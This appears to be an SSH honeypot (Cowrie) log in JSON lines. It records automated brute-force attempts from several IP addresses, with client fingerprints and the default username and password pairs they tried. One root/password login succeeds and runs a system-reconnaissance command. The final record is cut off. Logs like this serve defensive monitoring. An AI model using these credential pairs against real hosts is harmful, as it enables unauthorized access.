{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.607203Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40194,"dst_ip":"1.2.3.4","dst_port":22,"session":"394cab3e3ce3","protocol":"ssh","message":"New connection: 212.227.235.229:40194 (1.2.3.4:22) [session: 394cab3e3ce3]","sensor":"my-vps","timestamp":"2025-08-31T02:24:03.640335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:24:04.345656Z","src_ip":"212.227.235.229","session":"394cab3e3ce3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:24:04.346631Z","src_ip":"212.227.235.229","session":"394cab3e3ce3"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"admin123","message":"login attempt [elasticsearch/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:24:10.314389Z","src_ip":"212.227.235.229","session":"394cab3e3ce3"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:24:12.213922Z","src_ip":"212.227.235.229","session":"394cab3e3ce3"}
{"eventid":"cowrie.session.closed","duration":"22.2","message":"Connection lost after 22.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:24:15.920259Z","src_ip":"212.227.125.160","session":"4c2327ee8579"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50636,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8408455019d","protocol":"ssh","message":"New connection: 41.226.27.251:50636 (1.2.3.4:22) [session: a8408455019d]","sensor":"my-vps","timestamp":"2025-08-31T02:24:20.151233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:24:20.154377Z","src_ip":"41.226.27.251","session":"a8408455019d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:24:20.195226Z","src_ip":"41.226.27.251","session":"a8408455019d"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-31T02:24:20.364493Z","src_ip":"41.226.27.251","session":"a8408455019d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:24:21.650434Z","src_ip":"41.226.27.251","session":"a8408455019d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59056,"dst_ip":"1.2.3.4","dst_port":22,"session":"eab7675fa437","protocol":"ssh","message":"New connection: 212.227.125.160:59056 (1.2.3.4:22) [session: eab7675fa437]","sensor":"my-vps","timestamp":"2025-08-31T02:24:26.197669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:24:26.609281Z","src_ip":"212.227.125.160","session":"eab7675fa437"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:24:26.610421Z","src_ip":"212.227.125.160","session":"eab7675fa437"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"admin123","message":"login attempt [elasticsearch/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:24:28.514315Z","src_ip":"212.227.125.160","session":"eab7675fa437"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:24:30.022040Z","src_ip":"212.227.125.160","session":"eab7675fa437"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42358,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bd8abc5156c","protocol":"ssh","message":"New connection: 212.227.235.229:42358 (1.2.3.4:22) [session: 0bd8abc5156c]","sensor":"my-vps","timestamp":"2025-08-31T02:24:34.531519Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39708,"dst_ip":"1.2.3.4","dst_port":22,"session":"c17b15f1651b","protocol":"ssh","message":"New connection: 41.226.27.251:39708 (1.2.3.4:22) [session: c17b15f1651b]","sensor":"my-vps","timestamp":"2025-08-31T02:24:40.469428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:24:40.476614Z","src_ip":"41.226.27.251","session":"c17b15f1651b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:24:40.516892Z","src_ip":"41.226.27.251","session":"c17b15f1651b"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-31T02:24:40.704411Z","src_ip":"41.226.27.251","session":"c17b15f1651b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:24:41.944364Z","src_ip":"41.226.27.251","session":"c17b15f1651b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:24:42.742031Z","src_ip":"212.227.235.229","session":"0bd8abc5156c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:24:42.743128Z","src_ip":"212.227.235.229","session":"0bd8abc5156c"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49676,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f789a98882d","protocol":"ssh","message":"New connection: 41.226.27.251:49676 (1.2.3.4:22) [session: 1f789a98882d]","sensor":"my-vps","timestamp":"2025-08-31T02:25:00.730970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:25:00.794814Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:25:00.795829Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:25:00.967740Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:25:01.072556Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:25:01.073270Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:01.117411Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:01.118452Z","src_ip":"41.226.27.251","session":"1f789a98882d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49370,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d22b46915b1","protocol":"ssh","message":"New connection: 212.227.235.229:49370 (1.2.3.4:22) [session: 2d22b46915b1]","sensor":"my-vps","timestamp":"2025-08-31T02:25:06.270054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:25:07.042883Z","src_ip":"212.227.235.229","session":"2d22b46915b1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:25:07.043548Z","src_ip":"212.227.235.229","session":"2d22b46915b1"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"root123","message":"login attempt [elasticsearch/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:13.052490Z","src_ip":"212.227.235.229","session":"2d22b46915b1"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:14.982757Z","src_ip":"212.227.235.229","session":"2d22b46915b1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39416,"dst_ip":"1.2.3.4","dst_port":22,"session":"0137a3cbd5f3","protocol":"ssh","message":"New connection: 41.226.27.251:39416 (1.2.3.4:22) [session: 0137a3cbd5f3]","sensor":"my-vps","timestamp":"2025-08-31T02:25:20.991439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:25:21.066644Z","src_ip":"41.226.27.251","session":"0137a3cbd5f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:25:21.067967Z","src_ip":"41.226.27.251","session":"0137a3cbd5f3"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:21.284990Z","src_ip":"41.226.27.251","session":"0137a3cbd5f3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:22.605534Z","src_ip":"41.226.27.251","session":"0137a3cbd5f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38069,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e08bed78d27","protocol":"ssh","message":"New connection: 212.227.125.160:38069 (1.2.3.4:22) [session: 8e08bed78d27]","sensor":"my-vps","timestamp":"2025-08-31T02:25:22.710721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:25:22.711707Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:25:22.791670Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T02:25:23.197995Z","src_ip":"212.227.125.160","session":"8e08bed78d27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55710,"dst_ip":"1.2.3.4","dst_port":22,"session":"576ace963a16","protocol":"ssh","message":"New connection: 212.227.235.229:55710 (1.2.3.4:22) [session: 576ace963a16]","sensor":"my-vps","timestamp":"2025-08-31T02:25:23.638564Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:25:23.639735Z","src_ip":"212.227.235.229","session":"576ace963a16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56078,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6bab8f16133","protocol":"ssh","message":"New connection: 212.227.235.229:56078 (1.2.3.4:22) [session: f6bab8f16133]","sensor":"my-vps","timestamp":"2025-08-31T02:25:23.809823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:25:23.810806Z","src_ip":"212.227.235.229","session":"f6bab8f16133"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","e